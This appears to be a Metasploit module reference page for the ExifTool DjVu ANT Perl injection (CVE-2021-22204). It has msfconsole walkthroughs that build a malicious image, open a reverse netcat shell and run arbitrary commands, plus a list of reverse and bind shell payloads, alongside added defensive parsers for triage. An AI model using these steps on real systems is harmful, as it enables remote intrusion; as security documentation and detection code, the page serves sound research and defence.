ExifTool DjVu ANT Perl injection - Metasploit
This page contains detailed information about how to use the exploit/unix/fileformat/exiftool_djvu_ant_perl_injection Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: ExifTool DjVu ANT Perl injection
Module: exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
Source code: modules/exploits/unix/fileformat/exiftool_djvu_ant_perl_injection.rb
Disclosure date: 2021-05-24
Last modification time: 2021-05-11 12:11:22 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-22204
This module exploits a Perl injection vulnerability in the DjVu ANT parsing code of ExifTool versions 7.44 through 12.23 inclusive. The injection is used to execute a shell command using Perl backticks. The DjVu image can be embedded in a wrapper image using the HasselbladExif EXIF field.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
msf > use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
msf exploit(exiftool_djvu_ant_perl_injection) > show targets
... a list of targets ...
msf exploit(exiftool_djvu_ant_perl_injection) > set TARGET target-id
msf exploit(exiftool_djvu_ant_perl_injection) > show options
... show and set options ...
msf exploit(exiftool_djvu_ant_perl_injection) > exploit
Knowledge Base
Vulnerable Application
ExifTool is vulnerable to Perl code injection when parsing a crafted DjVu ANT (annotation) chunk: the annotation text is handed to Perl's eval after an escaping step that could be bypassed, so a crafted annotation runs arbitrary Perl with the privileges of whoever invoked ExifTool. Using the 'HasselbladExif' EXIF field, a DjVu file containing the ANT data can be embedded in another file, such as a JPEG or TIFF, so both a bare DjVu and a "wrapped" DjVu trigger the bug. Anything that feeds untrusted images to ExifTool is exposed, including server-side upload pipelines (the GitLab case is covered by exploit/multi/http/gitlab_exif_rce, listed under See Also).
The module uses Perl backticks inside the injected code to execute a shell command.
The vulnerability affects ExifTool 7.44 through 12.23 inclusive; 12.24 contains the fix (commit cf0f4e7, listed under References).
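The ANT chunk is what ExifTool evaluates, so an analyst triaging a suspicious DjVu wants to see it. The parser below is an added example, not code from the Metasploit module or from ExifTool: it walks the IFF85 chunk layout of a DjVu file (the AT&T magic, a FORM container, 4-byte big-endian chunk lengths padded to even offsets), collects the ANTa/ANTz annotation chunks, descends into the nested page FORMs of a DJVM bundle, and builds its own constructed sample files so it runs offline. The backtick check is a triage heuristic I added, not a signature of the injection.

```python
import struct

DJVU_MAGIC = b"AT&T"
ANT_CHUNK_IDS = (b"ANTa", b"ANTz")    # plain-text and BZZ-compressed annotation chunks


def iff_chunks(data, offset, end):
    """Yield (id, payload) for the IFF85 chunks in data[offset:end]:
    4-byte ID, 4-byte big-endian length, payload, padding to an even offset."""
    while offset + 8 <= end:
        cid = data[offset:offset + 4]
        length = struct.unpack(">I", data[offset + 4:offset + 8])[0]
        payload = data[offset + 8:offset + 8 + length]
        if len(payload) < length:
            break                                   # truncated chunk: stop rather than guess
        yield cid, payload
        offset += 8 + length + (length & 1)


def djvu_annotations(blob):
    """Return [(id, payload)] for every ANT chunk in a DjVu container.
    Single pages (DJVU) and bundles (DJVM, whose pages are nested FORMs) are both handled."""
    if len(blob) < 16 or not blob.startswith(DJVU_MAGIC + b"FORM"):
        return []
    form_len = struct.unpack(">I", blob[8:12])[0]   # counts the bytes after this field
    found = []
    for cid, payload in iff_chunks(blob, 16, min(len(blob), 12 + form_len)):
        if cid in ANT_CHUNK_IDS:
            found.append((cid, payload))
        elif cid == b"FORM":                        # a page inside a bundle: parse it as its own container
            found += djvu_annotations(DJVU_MAGIC + b"FORM" + struct.pack(">I", len(payload)) + payload)
    return found


def describe(blob):
    """Analyst-facing summary lines. ANTz payloads are compressed, so only their presence
    is reported; ANTa text is shown and flagged when it contains a backtick (heuristic)."""
    lines = []
    for cid, payload in djvu_annotations(blob):
        if cid == b"ANTz":
            lines.append(f"ANTz (compressed) annotation, {len(payload)} bytes")
        else:
            text = payload.decode("latin-1")
            flag = " [contains backtick]" if "`" in text else ""
            lines.append(f"ANTa annotation{flag}: {text}")
    return lines


def build_djvu(annotation, chunk_id=b"ANTa"):
    """Constructed sample: a minimal single-page DjVu whose only chunk is the annotation."""
    chunk = chunk_id + struct.pack(">I", len(annotation)) + annotation + b"\x00" * (len(annotation) & 1)
    return DJVU_MAGIC + b"FORM" + struct.pack(">I", 4 + len(chunk)) + b"DJVU" + chunk


def build_djvm(*pages):
    """Constructed sample: a DJVM bundle of single-page blobs (omits the DIRM directory a real bundle has)."""
    body = b"DJVM"
    for page in pages:
        inner = page[12:]                           # "DJVU" + chunks, i.e. the page's FORM payload
        body += b"FORM" + struct.pack(">I", len(inner)) + inner + b"\x00" * (len(inner) & 1)
    return DJVU_MAGIC + b"FORM" + struct.pack(">I", len(body)) + body


SAMPLE_ANNOTATION = b'(metadata (Author "constructed sample with a `backtick`"))'
SAMPLE_DJVU = build_djvu(SAMPLE_ANNOTATION)
BENIGN_ANNOTATION = b'(metadata (Author "just a title"))'
BENIGN_DJVU = build_djvu(BENIGN_ANNOTATION)
```

Run `describe()` over any DjVu pulled from an upload queue; an ANTz chunk cannot be inspected without a BZZ decoder, so treat its presence in an unexpected place as reason to quarantine rather than as proof either way.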
A copy of the vulnerable software can be obtained at https://github.com/exiftool/exiftool/releases/tag/12.23
The .tar.gz can simply be unpacked and used as-is:
% tar -xf 12.23.tar.gz
% ./exiftool-12.23/exiftool exiftool-12.23/t/images/Writer.jpg
ExifTool Version Number : 12.23
File Name : Writer.jpg
Directory : exiftool-12.23/t/images
File Size : 251 bytes
File Modification Date/Time : 2021:04:02 05:24:21+11:00
File Access Date/Time : 2021:05:04 20:57:46+10:00
File Inode Change Date/Time : 2021:05:04 20:57:46+10:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Image Width : 8
Image Height : 8
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 8x8
Megapixels : 0.000064
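To triage an installed copy against the affected range, an added helper (not from the module or from ExifTool) that parses the version out of `exiftool -ver` output, out of the "ExifTool Version Number" line of a report like the one above, or out of a distribution package version string:

```python
import re
import subprocess

FIRST_VULNERABLE, LAST_VULNERABLE = 7.44, 12.23       # affected range from the module description
VERSION_RE = re.compile(r"\b(\d+\.\d+)")


def parse_exiftool_version(text):
    """Numeric ExifTool version from `exiftool -ver` output, an 'ExifTool Version Number'
    report line, or a package string such as '11.16-1+deb10u1' (first dotted number wins)."""
    m = VERSION_RE.search(text)
    return float(m.group(1)) if m else None


def is_vulnerable_version(text):
    """True when the parsed version lies in 7.44..12.23 inclusive. ExifTool's $VERSION
    is a plain decimal, so float comparison orders releases as the project does
    (12.09 < 12.23 < 12.24)."""
    v = parse_exiftool_version(text)
    return v is not None and FIRST_VULNERABLE <= v <= LAST_VULNERABLE


def check_installed(exiftool="exiftool"):
    """Run the given binary with -ver (prints just the version) and return (version, vulnerable)."""
    out = subprocess.run([exiftool, "-ver"], capture_output=True, text=True, check=True).stdout
    return parse_exiftool_version(out), is_vulnerable_version(out)


if __name__ == "__main__":
    import sys
    print(check_installed(*sys.argv[1:2]))
```

Distribution packages fixed by the advisories listed under "Related Nessus plugins" keep their upstream version number, so this check over-reports on them; read a "vulnerable" verdict there as "confirm against the package changelog", not as a finding.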
Verification Steps
- Obtain the vulnerable application
- Start msfconsole
- Do: use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
- Set the payload and payload options as appropriate
- Do: exploit
- Start a handler
- Transfer the generated msf.jpg file to the machine running the vulnerable application
- On the victim machine, do: exiftool msf.jpg
- You should get a shell
Options
TARGET
- you can choose between JPEG (default), TIFF and DjVu
FILENAME
- the name of the image file to produce. Note that it is safe to rename a file after it has been generated.
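The three targets differ only in the wrapper: the JPEG and TIFF targets carry the same DjVu blob inside the HasselbladExif EXIF tag. The following added example (not part of the module) extracts that tag from either wrapper and reports whether its value is a DjVu container. It assumes tag ID 0xc51b, the ID ExifTool's tag table assigns to HasselbladExif, walks only the main IFD chain (not ExifIFD or maker notes), and uses sample files constructed here, with an empty container standing in for the real DjVu.

```python
import struct

HASSELBLAD_EXIF_TAG = 0xC51B          # EXIF tag that ExifTool names "HasselbladExif" (assumed ID)
DJVU_MAGIC = b"AT&T"
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8, 11: 4, 12: 8}


def tiff_tag_values(tiff, tag):
    """Raw bytes of every entry carrying `tag`, following the IFD chain (IFD0, IFD1, ...)
    in either byte order. Sub-IFDs (ExifIFD, MakerNotes) are not descended into."""
    bo = {b"II*\x00": "<", b"MM\x00*": ">"}.get(tiff[:4])
    if bo is None:
        return []
    values, off, seen = [], struct.unpack(bo + "I", tiff[4:8])[0], set()
    while off and off not in seen and off + 2 <= len(tiff):
        seen.add(off)                                # a looping IFD chain must not hang the scanner
        count = struct.unpack(bo + "H", tiff[off:off + 2])[0]
        for e in range(off + 2, min(off + 2 + 12 * count, len(tiff) - 11), 12):
            t, typ, n, raw = struct.unpack(bo + "HHI4s", tiff[e:e + 12])
            size = TYPE_SIZES.get(typ, 1) * n
            if size <= 4:
                value = raw[:size]                   # values of up to 4 bytes live inline
            else:
                voff = struct.unpack(bo + "I", raw)[0]
                value = tiff[voff:voff + size]
            if t == tag:
                values.append(value)
        nxt = off + 2 + 12 * count
        off = struct.unpack(bo + "I", tiff[nxt:nxt + 4])[0] if nxt + 4 <= len(tiff) else 0
    return values


def jpeg_exif_blobs(data):
    """TIFF blob from every APP1 'Exif' segment of a JPEG (there is normally one)."""
    blobs, pos = [], 2
    if data[:2] != b"\xff\xd8":
        return blobs
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
            pos += 2                                 # standalone marker without a length field
            continue
        if marker in (0xDA, 0xD9):
            break                                    # entropy-coded data or end of image: no more headers
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        seg = data[pos + 4:pos + 2 + seg_len]
        if marker == 0xE1 and seg.startswith(b"Exif\x00\x00"):
            blobs.append(seg[6:])
        pos += 2 + seg_len
    return blobs


def hasselblad_payloads(data):
    """Every HasselbladExif value in a JPEG or TIFF as (is_djvu, value) pairs.
    A DjVu container inside an EXIF tag is the wrapped form this module produces."""
    tiffs = [data] if data[:4] in (b"II*\x00", b"MM\x00*") else jpeg_exif_blobs(data)
    values = [v for t in tiffs for v in tiff_tag_values(t, HASSELBLAD_EXIF_TAG)]
    return [(v.startswith(DJVU_MAGIC), v) for v in values]


# Constructed samples (not real captures); the "DjVu" here is an empty container.
def build_tiff(tag, typ, value, big_endian=False):
    """TIFF with one IFD0 entry whose (> 4 byte) value sits right after the IFD at offset 26."""
    bo, header = (">", b"MM\x00*") if big_endian else ("<", b"II*\x00")
    return header + struct.pack(bo + "IHHHIII", 8, 1, tag, typ, len(value), 26, 0) + value


def build_jpeg(tiff):
    """JPEG whose only segment before EOI is an APP1 Exif segment wrapping the TIFF."""
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


EMPTY_DJVU = DJVU_MAGIC + b"FORM" + struct.pack(">I", 4) + b"DJVU"
WRAPPED_TIFF = build_tiff(HASSELBLAD_EXIF_TAG, 7, EMPTY_DJVU)             # type 7 = UNDEFINED
WRAPPED_TIFF_BE = build_tiff(HASSELBLAD_EXIF_TAG, 7, EMPTY_DJVU, big_endian=True)
WRAPPED_JPEG = build_jpeg(WRAPPED_TIFF)
CLEAN_TIFF = build_tiff(0x010E, 2, b"ImageDescription only\x00")        # 0x010e = ImageDescription
```

Genuine Hasselblad files also carry this tag, so the tag alone is not a verdict; the DjVu magic in its value is what has no legitimate explanation. Feed the extracted value to a DjVu annotation parser to see the ANT chunk itself.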
Scenarios
ExifTool 12.23 - Reverse TCP shell
Generate the image file
msf6 > use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > set LPORT 4444
LPORT => 4444
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > exploit
[+] msf.jpg stored at /home/justin/.msf4/local/msf.jpg
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) >
Start a handler
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
As the victim, use ExifTool to analyse the image
% ~/exiftool-12.23/exiftool /home/justin/.msf4/local/msf.jpg
ExifTool will hang (the backtick command, and with it the Perl process, blocks until the reverse shell exits) and a shell session will be opened
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38606) at 2021-05-04 21:07:37 +1000
id
uid=31337(justin) gid=31337(justin) groups=31337(justin),27(sudo)
ExifTool 12.23 - Arbitrary command execution
Generate the image file
msf6 > use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > set CMD 'echo "Pwned as $(id)"'
CMD => echo "Pwned as $(id)"
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > exploit
[+] msf.jpg stored at /home/justin/.msf4/local/msf.jpg
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) >
As the victim, use ExifTool to analyse the image. The STDOUT of CMD will be reflected in the 'Author' EXIF field.
% ~/exiftool-12.23/exiftool /home/justin/.msf4/local/msf.jpg | grep Author
Author : .Pwned as uid=31337(justin) gid=31337(justin) groups=31337(justin),27(sudo).
Msfconsole Usage
Here is how the unix/fileformat/exiftool_djvu_ant_perl_injection exploit module looks in the msfconsole:
msf6 > use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show info
Name: ExifTool DjVu ANT Perl injection
Module: exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
Platform: Unix
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2021-05-24
Provided by:
William Bowling
Justin Steven
Available targets:
Id Name
-- ----
0 JPEG file
1 TIFF file
2 DjVu file
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.jpg yes Output file
Payload information:
Space: 2000
Avoid: 5 characters
Description:
This module exploits a Perl injection vulnerability in the DjVu ANT
parsing code of ExifTool versions 7.44 through 12.23 inclusive. The
injection is used to execute a shell command using Perl backticks.
The DjVu image can be embedded in a wrapper image using the
HasselbladExif EXIF field.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-22204
https://twitter.com/wcbowling/status/1385803927321415687
https://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031
https://www.openwall.com/lists/oss-security/2021/05/10/5
Module Options
This is a complete list of options available in the unix/fileformat/exiftool_djvu_ant_perl_injection exploit:
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show options
Module options (exploit/unix/fileformat/exiftool_djvu_ant_perl_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.jpg yes Output file
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 JPEG file
Advanced Options
Here is a complete list of advanced options supported by the unix/fileformat/exiftool_djvu_ant_perl_injection exploit:
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show advanced
Module advanced options (exploit/unix/fileformat/exiftool_djvu_ant_perl_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler true no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the unix/fileformat/exiftool_djvu_ant_perl_injection module can exploit:
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show targets
Exploit targets:
Id Name
-- ----
0 JPEG file
1 TIFF file
2 DjVu file
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the unix/fileformat/exiftool_djvu_ant_perl_injection exploit:
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
3 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
4 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
5 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
6 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
7 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
8 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
9 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
10 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
11 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
12 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
13 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
14 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
15 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
16 payload/cmd/unix/pingback_bind normal No Unix Command Shell, Pingback Bind TCP (via netcat)
17 payload/cmd/unix/pingback_reverse normal No Unix Command Shell, Pingback Reverse TCP (via netcat)
18 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
19 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
20 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
21 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
22 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
23 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
24 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
25 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
26 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
27 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
28 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
29 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
30 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
31 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
32 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
33 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
34 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
35 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
36 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
37 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
38 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
39 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
40 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
41 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
42 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
43 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
44 payload/generic/custom normal No Custom Payload
45 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
46 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the unix/fileformat/exiftool_djvu_ant_perl_injection exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
References
- CVE-2021-22204
- https://twitter.com/wcbowling/status/1385803927321415687
- https://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031
- https://www.openwall.com/lists/oss-security/2021/05/10/5
See Also
Check also the following modules related to this module:
- exploit/multi/http/gitlab_exif_rce
- exploit/unix/fileformat/ghostscript_type_confusion
- exploit/unix/fileformat/imagemagick_delegate
- exploit/unix/fileformat/metasploit_libnotify_cmd_injection
- exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
- exploit/unix/webapp/actualanalyzer_ant_cookie_exec
- exploit/unix/webapp/instantcms_exec
- exploit/unix/local/exim_perl_startup
- exploit/unix/dhcp/rhel_dhcp_client_command_injection
- exploit/unix/http/pfsense_graph_injection_exec
- exploit/unix/webapp/ajenti_auth_username_cmd_injection
- exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
- exploit/unix/webapp/opennetadmin_ping_cmd_injection
- exploit/windows/fileformat/djvu_imageurl
- encoder/cmd/perl
- payload/cmd/unix/bind_perl
- payload/cmd/unix/bind_perl_ipv6
- payload/cmd/unix/reverse_perl
- payload/cmd/unix/reverse_perl_ssl
- payload/cmd/windows/bind_perl
- payload/cmd/windows/bind_perl_ipv6
- payload/cmd/windows/reverse_perl
- payload/php/bind_perl
- payload/php/bind_perl_ipv6
- payload/php/reverse_perl
Related Nessus plugins:
- Debian DSA-4910-1 : libimage-exiftool-perl - security update
- Debian DLA-2663-1 : libimage-exiftool-perl security update
- openSUSE Security Update : perl-Image-ExifTool (openSUSE-2021-707)
- Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 : ExifTool vulnerability (USN-4987-1)
Authors
- William Bowling
- Justin Steven
Version
This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.